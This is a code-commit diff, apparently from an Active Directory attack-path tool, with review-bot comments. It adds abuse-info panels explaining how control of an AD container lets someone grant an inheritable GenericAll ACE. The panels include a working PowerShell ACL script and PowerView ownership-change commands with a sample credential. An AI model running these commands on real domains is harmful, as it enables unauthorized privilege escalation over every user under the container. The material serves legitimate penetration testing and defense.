more abuse info (#889)
JonasBK authored Sep 25, 2024
1 parent 9587786 commit 538513e
Showing 6 changed files with 160 additions and 4 deletions.
@@ -18,7 +18,15 @@ import { FC } from 'react';
import { Typography } from '@mui/material';

const Abuse: FC = () => {
return <Typography variant='body2'>There is no abuse info related to this edge.</Typography>;
return (
<>
<Typography variant='body2'>
Permissions on the parent of a child object may enable compromise of the child object through inherited
ACEs or linked GPOs.
</Typography>
<Typography variant='body2'>See the inbound edges on the parent object for details.</Typography>
</>
);
};

export default Abuse;
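Review bot: The new first `Typography` in `Abuse` does not say that inheritance can be blocked on the child, so a reader may assume every contained object picks up the parent's ACEs. A child whose ACL has inheritance disabled (for example an account protected by AdminSDHolder) does not receive them. I would append a short qualifier such as `Child objects with ACL inheritance disabled are not affected by ACEs inherited from the parent.` The pointer to the parent's inbound edges in the second paragraph is useful and can stay as it is.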
@@ -25,9 +25,6 @@ const General: FC<EdgeInfoProps> = ({ sourceName, sourceType, targetName, target
<Typography variant='body2'>
{typeFormat(sourceType)} {sourceName} contains the {typeFormat(targetType)} {targetName}.
</Typography>
<Typography variant='body2'>
GPOs linked to a container apply to all objects that are contained by the container.
</Typography>
</>
);
};
@@ -17,6 +17,7 @@
import { FC } from 'react';
import { Link, Typography } from '@mui/material';
import { EdgeInfoProps } from '../index';
import CodeController from '../CodeController/CodeController';

const WindowsAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> = ({
sourceName,
@@ -699,6 +700,37 @@ const WindowsAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> =
</Typography>
</>
);
case 'Container':
return (
<>
<Typography variant='body2'>
With full control of the container, you may add a new ACE on the container that will inherit
down to the objects under that container.
</Typography>
<Typography variant='body2'>This can be done with PowerShell:</Typography>
<CodeController>
{`$containerDN = "CN=USERS,DC=DUMPSTER,DC=FIRE"
$principalName = "principal" # SAM account name of principal
# Find the certificate template
$template = [ADSI]"LDAP://$containerDN"
# Construct the ACE
$account = New-Object System.Security.Principal.NTAccount($principalName)
$sid = $account.Translate([System.Security.Principal.SecurityIdentifier])
$ace = New-Object DirectoryServices.ActiveDirectoryAccessRule(
$sid,
[System.DirectoryServices.ActiveDirectoryRights]::GenericAll,
[System.Security.AccessControl.AccessControlType]::Allow,
[System.DirectoryServices.ActiveDirectorySecurityInheritance]::Descendents
)
# Add the new ACE to the ACL
$acl = $template.psbase.ObjectSecurity
$acl.AddAccessRule($ace)
$template.psbase.CommitChanges()`}
</CodeController>
</>
);
case 'CertTemplate':
return (
<>
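Review bot: The `# Find the certificate template` comment and the `$template` variable in the `case 'Container'` script look like leftovers from the certificate-template example, while the object actually bound is the container at `$containerDN`. Rename them so the script reads correctly when copied: `# Find the container` and `$container = [ADSI]"LDAP://$containerDN"`, with the two later `$template.psbase` uses following the new name. The same script, with the same leftover names, is added in the `case 'Container'` hunks of the three other WindowsAbuse sections on this page. The enclosing switch starts and ends outside the hunk.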
@@ -17,6 +17,7 @@
import { FC } from 'react';
import { Link, Typography } from '@mui/material';
import { EdgeInfoProps } from '../index';
import CodeController from '../CodeController/CodeController';

const WindowsAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> = ({
sourceName,
@@ -921,6 +922,37 @@ const WindowsAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> =
</Typography>
</>
);
case 'Container':
return (
<>
<Typography variant='body2'>
With ownership of the container object, you may grant yourself the GenericAll permission
inherited to child objects.
</Typography>
<Typography variant='body2'>This can be done with PowerShell:</Typography>
<CodeController>
{`$containerDN = "CN=USERS,DC=DUMPSTER,DC=FIRE"
$principalName = "principal" # SAM account name of principal
# Find the certificate template
$template = [ADSI]"LDAP://$containerDN"
# Construct the ACE
$account = New-Object System.Security.Principal.NTAccount($principalName)
$sid = $account.Translate([System.Security.Principal.SecurityIdentifier])
$ace = New-Object DirectoryServices.ActiveDirectoryAccessRule(
$sid,
[System.DirectoryServices.ActiveDirectoryRights]::GenericAll,
[System.Security.AccessControl.AccessControlType]::Allow,
[System.DirectoryServices.ActiveDirectorySecurityInheritance]::Descendents
)
# Add the new ACE to the ACL
$acl = $template.psbase.ObjectSecurity
$acl.AddAccessRule($ace)
$template.psbase.CommitChanges()`}
</CodeController>
</>
);
case 'CertTemplate':
return (
<>
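Review bot: The PowerShell template literal inside `<CodeController>` in this `case 'Container'` is a verbatim copy of the one added in the three other `case 'Container'` hunks on this page, so any correction to it has to be made four times. Consider exporting it once as a string constant from a shared module (for instance `CONTAINER_INHERITED_ACE_SCRIPT`) and rendering `<CodeController>{CONTAINER_INHERITED_ACE_SCRIPT}</CodeController>` in each panel. Only the introductory `Typography` sentence differs between the panels, so that part can stay local. The enclosing switch continues outside the hunk.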
@@ -17,6 +17,7 @@
import { FC } from 'react';
import { Link, Typography } from '@mui/material';
import { EdgeInfoProps } from '../index';
import CodeController from '../CodeController/CodeController';

const WindowsAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> = ({
sourceName,
@@ -864,6 +865,37 @@ const WindowsAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> =
</Typography>
</>
);
case 'Container':
return (
<>
<Typography variant='body2'>
With WriteDacl on the container object, you may grant yourself the GenericAll permission
inherited to child objects.
</Typography>
<Typography variant='body2'>This can be done with PowerShell:</Typography>
<CodeController>
{`$containerDN = "CN=USERS,DC=DUMPSTER,DC=FIRE"
$principalName = "principal" # SAM account name of principal
# Find the certificate template
$template = [ADSI]"LDAP://$containerDN"
# Construct the ACE
$account = New-Object System.Security.Principal.NTAccount($principalName)
$sid = $account.Translate([System.Security.Principal.SecurityIdentifier])
$ace = New-Object DirectoryServices.ActiveDirectoryAccessRule(
$sid,
[System.DirectoryServices.ActiveDirectoryRights]::GenericAll,
[System.Security.AccessControl.AccessControlType]::Allow,
[System.DirectoryServices.ActiveDirectorySecurityInheritance]::Descendents
)
# Add the new ACE to the ACL
$acl = $template.psbase.ObjectSecurity
$acl.AddAccessRule($ace)
$template.psbase.CommitChanges()`}
</CodeController>
</>
);
case 'CertTemplate':
return (
<>
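Review bot: The `case 'Container'` text stops at `CommitChanges()` and documents neither how to undo the change nor what it leaves behind. That matters here because the ACE grants `GenericAll` with `Descendents` inheritance, so it reaches every inheriting object under the container. I would add a closing `Typography` along the lines of `Remove the ACE once testing is complete; the DACL change is recorded as a directory service change (event 5136) where that auditing is enabled.` If this edge has a separate opsec panel the second half belongs there instead; none is among the files in this commit. The same gap applies to the other three `case 'Container'` hunks.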
@@ -17,6 +17,7 @@
import { FC } from 'react';
import { Link, Typography } from '@mui/material';
import { EdgeInfoProps } from '../index';
import CodeController from '../CodeController/CodeController';

const WindowsAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> = ({
sourceName,
@@ -1019,6 +1020,60 @@ const WindowsAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> =
</Typography>
</>
);
case 'Container':
return (
<>
<Typography variant='body2'>
To change the ownership of the object, you may use the Set-DomainObjectOwner function in
PowerView.
</Typography>
<Typography variant='body2'>
You may need to authenticate to the Domain Controller as{' '}
{sourceType === 'User'
? `${sourceName} if you are not running a process as that user`
: `a member of ${sourceName} if you are not running a process as a member`}
. To do this in conjunction with Set-DomainObjectOwner, first create a PSCredential object
(these examples comes from the PowerView help documentation):
</Typography>
<Typography component={'pre'}>
{"$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n" +
"$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)"}
</Typography>
<Typography variant='body2'>
Then, use Set-DomainObjectOwner, optionally specifying $Cred if you are not already running a
process as a member of (the group that holds this ACE):
</Typography>
<Typography component={'pre'}>
{'Set-DomainObjectOwner -Credential $Cred -TargetIdentity dfm -OwnerIdentity harmj0y'}
</Typography>
<Typography variant='body2'>
Now with ownership of the container object, you may grant yourself the GenericAll permission
inherited to child objects.
</Typography>
<Typography variant='body2'>This can be done with PowerShell:</Typography>
<CodeController>
{`$containerDN = "CN=USERS,DC=DUMPSTER,DC=FIRE"
$principalName = "principal" # SAM account name of principal
# Find the certificate template
$template = [ADSI]"LDAP://$containerDN"
# Construct the ACE
$account = New-Object System.Security.Principal.NTAccount($principalName)
$sid = $account.Translate([System.Security.Principal.SecurityIdentifier])
$ace = New-Object DirectoryServices.ActiveDirectoryAccessRule(
$sid,
[System.DirectoryServices.ActiveDirectoryRights]::GenericAll,
[System.Security.AccessControl.AccessControlType]::Allow,
[System.DirectoryServices.ActiveDirectorySecurityInheritance]::Descendents
)
# Add the new ACE to the ACL
$acl = $template.psbase.ObjectSecurity
$acl.AddAccessRule($ace)
$template.psbase.CommitChanges()`}
</CodeController>
</>
);
case 'CertTemplate':
return (
<>
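Review bot: The third paragraph of this `case 'Container'` still carries the unfilled placeholder `(the group that holds this ACE)`, and the `Set-DomainObjectOwner` example names `dfm` and `harmj0y` rather than the container and principal the panel is about. The paragraph before it already branches on `sourceType === 'User'` to interpolate `sourceName`, and the same conditional can replace the placeholder. In the same paragraph, `these examples comes` should read `these examples come`. The two PowerView snippets are rendered with `<Typography component={'pre'}>` while the new script uses `<CodeController>`; using `CodeController` for all three would keep the panel consistent. The enclosing switch continues outside the hunk.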